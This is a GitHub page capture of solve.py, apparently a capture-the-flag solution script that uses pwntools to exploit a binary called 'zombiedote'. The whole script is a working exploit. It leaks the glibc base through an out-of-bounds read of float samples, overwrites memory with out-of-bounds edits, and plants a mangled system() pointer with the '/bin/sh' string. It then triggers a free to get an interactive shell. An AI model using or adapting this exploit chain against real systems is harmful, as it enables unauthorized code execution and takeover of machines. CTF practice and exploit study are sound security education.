-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathsolve.py
71 lines (46 loc) · 1.67 KB
/
solve.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/usr/bin/env python3
from pwn import context, ELF, p64, remote, sys, u64
from struct import pack, unpack
from typing import List
context.binary = elf = ELF('zombiedote')
glibc = ELF('glibc/libc.so.6', checksec=False)
def get_process():
if len(sys.argv) == 1:
return elf.process()
host, port = sys.argv[1].split(':')
return remote(host, port)
def create(number: int):
p.sendlineafter(b'>> ', b'1')
p.sendlineafter(b'Number of samples: ', str(number).encode())
def insert(samples: List[float]):
p.sendlineafter(b'>> ', b'2')
p.sendlineafter(b'Number of samples tested: ', str(len(samples)).encode())
for sample in samples:
p.sendlineafter(b'(%): ', str(sample).encode())
def delete():
p.sendlineafter(b'>> ', b'3')
def edit(number: int, sample: float):
p.sendlineafter(b'>> ', b'4')
p.sendlineafter(b'Enter sample number: ', str(number).encode())
p.sendlineafter(b'(%): ', str(sample).encode())
def inspect(number: int) -> float:
p.sendlineafter(b'>> ', b'5')
p.sendlineafter(b'Enter sample number to inspect: ', str(number).encode())
p.recvuntil(b'(%): ')
return float(p.recvline().decode())
def main():
create(17000)
glibc.address = u64(pack('d', inspect(329732))) - glibc.sym.__GI__dl_catch_error
p.success(f'Glibc base address: {hex(glibc.address)}')
mmap_chunk = glibc.address - 0x24ff0
edit(17627, unpack('d', p64(mmap_chunk))[0])
edit(17644, 0)
insert([
unpack('d', p64(glibc.sym.system << 17))[0],
unpack('d', p64(next(glibc.search(b'/bin/sh'))))[0],
])
delete()
p.interactive()
if __name__ == '__main__':
p = get_process()
main()